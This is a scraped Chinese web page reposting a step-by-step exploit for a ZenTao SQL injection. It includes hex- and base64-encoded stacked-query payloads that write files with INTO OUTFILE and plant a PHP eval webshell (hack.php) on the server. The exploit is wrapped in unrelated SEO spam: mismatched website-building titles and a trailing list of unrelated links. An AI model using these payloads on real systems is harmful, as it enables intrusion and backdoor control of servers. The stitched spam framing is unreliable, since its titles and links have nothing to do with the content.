当前位置: 首页 > news >正文

汕头企业做网站深圳代理网络推广公司

汕头企业做网站,深圳代理网络推广公司,wordpress添加支付宝打赏,平台开发网站建设公司官网漏洞分析附上某老哥的漏洞分析#xff0c;来了解下原理。 漏洞利用查看版本#xff1a;访问Url#xff1a;http://127.0.0.1/zentao/index.php?modegetconfig即可获取禅道的版本号以及一些其他的信息#xff0c;目前漏洞存在于v8.2~v9.2确定版本号之后#xff0c;我们就… ·  漏洞分析附上某老哥的漏洞分析来了解下原理。·   漏洞利用查看版本访问Urlhttp://127.0.0.1/zentao/index.php?modegetconfig即可获取禅道的版本号以及一些其他的信息目前漏洞存在于v8.2~v9.2确定版本号之后我们就可以尝试GetShell利用漏洞根据另一个老哥博客提供的***方法获取站点路径然后注入一句话***但我试了一下获取的并不是完整的路径而是模块路径的报错后来换了一种思路有兴趣的朋友可以看下哪位老哥的漏洞利用查看密码忘记文本路径访问Urlhttp://127.0.0.1/zentao/user-reset.html写入忘记密码的文本shell语句命令select  into outfile /opt/zbox/app/zentao/tmp/reset_5c7e631454ae5.txtHEX编码注意加密解密都不带0x但是EXP中需要加上73656c65637420272720696e746f206f757466696c65202f6f70742f7a626f782f6170702f7a656e74616f2f746d702f72657365745f356337653633313435346165352e74787427注入文件语句{orderBy:order limit 1;SET SQL0x73656c65637420272720696e746f206f757466696c65202f6f70742f7a626f782f6170702f7a656e74616f2f746d702f72657365745f356337653633313435346165352e74787427;PREPARE pord FROM SQL;EXECUTE pord;-- -,num:1,1,type:openedbyme}base64加密eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjcyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyZjZmNzA3NDJmN2E2MjZmNzgyZjYxNzA3MDJmN2E2NTZlNzQ2MTZmMmY3NDZkNzAyZjcyNjU3MzY1NzQ1ZjM1NjMzNzY1MzYzMzMxMzQzNTM0NjE2NTM1MmU3NDc4NzQyNztQUkVQQVJFIHBvcmQgRlJPTSBAU1FMO0VYRUNVVEUgcG9yZDstLSAtIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ使用火狐的HackBar插件工具进行注入提交地址 http://127.0.0.1:81/zentao/index.php?mblockfmainmodegetblockdatablockidcaseparambase64※exp需要base64加密后才能提交且回显、写Shell须加上Refererhttp://127.0.0.1/zentao/我们通过注入刚才的文本文件后进入后台-备份获取禅道的安装位置这里显示的是 /opt/zbox/app/zentao/tmp/backup/201903060030545.sql.php那么站点的目录的位置就是 /opt/zbox/app/zentao/www然后通过上面的方式再注入一句话***shell语句命令select ?php eval($_POST[123456])? into outfile /opt/zbox/app/zentao/www/hack.phpHEX编码73656c65637420273c3f70687020406576616c28245f504f53545b3132333435365d293f3e2720696e746f206f757466696c6520272f6f70742f7a626f782f6170702f7a656e74616f2f7777772f6861636b2e70687027注入文件语句{orderBy:order limit 1;SET SQL0x73656c65637420273c3f70687020406576616c28245f504f53545b3132333435365d293f3e2720696e746f206f757466696c6520272f6f70742f7a626f782f6170702f7a656e74616f2f7777772f6861636b2e70687027;PREPARE pord FROM SQL;EXECUTE pord;-- -,num:1,1,type:openedbyme}base64加密eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxMzIzMzM0MzUzNjVkMjkzZjNlMjcyMDY5NmU3NDZmMjA2Zjc1NzQ2NjY5NmM2NTIwMjcyZjZmNzA3NDJmN2E2MjZmNzgyZjYxNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjY4NjE2MzZiMmU3MDY4NzAyNztQUkVQQVJFIHBvcmQgRlJPTSBAU1FMO0VYRUNVVEUgcG9yZDstLSAtIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ注入之后我们就可以通过GetShell工具进行服务器的控制连接 转载于:https://blog.51cto.com/13444271/2358833
http://www.pierceye.com/news/201843/

相关文章:

  • 免费做问卷的网站网站建设 好发信息网
  • 网站职能建设论文网页跳转链接怎么制作
  • 专题网站开发工具有哪些wordpress迁移500
  • 酒泉网站建设费用磁力搜索引擎不死鸟
  • 有网站是做水果原产地代发的吗临沂哪家做网站最好
  • 网站建设的背景wordpress htaccess
  • 如何在百度上注册自己的网站郓城做网站哪家好
  • 企业电子商务网站建设总结安徽建设工程信息网查询平台公司
  • 推荐常州微信网站建设做外汇看的网站
  • 网站页面优化方案网页设计培训费用多少
  • 落寞文学网单本多本小说wordpress主题哈尔滨网站优化指导
  • 网站域名使用费用网站在vps能访问 在本地访问不了
  • wordpress可以做成企业站吗一个域名可以建设几个网站
  • 企业网站备案需要什么资料工装装饰公司
  • 网站建设精美模板下载邢台165信息交友
  • 普陀区建设工程质检网站网站关键词优化排名
  • 云服务器多网站解析企业网站打不开了
  • 搭建flv视频网站如何注册域名步骤
  • 平面设计公司网站单页模板
  • 网站模板 代码免费建设部网站有项目经理资质查询系统
  • 网站建设注意哪些方面wordpress 做手机站
  • 淄博网站制作定制推广网站程序源代码
  • 二手房地产中介网站建设wordpress改背景图片
  • 可以自己做安卓app的网站Wordpress会员插件出错
  • 做网站优化有前景吗可信网站验证服务中心
  • 韩国设计欣赏网站天津工程建设网官方网站
  • 微网站建设多少钱网站空间管理
  • 济南网站制作定制公司wordpress重新安装主题
  • python 网站开发教程怎么做网站跳转
  • 个人盈利网站怎么建立网站建设 深圳 凡科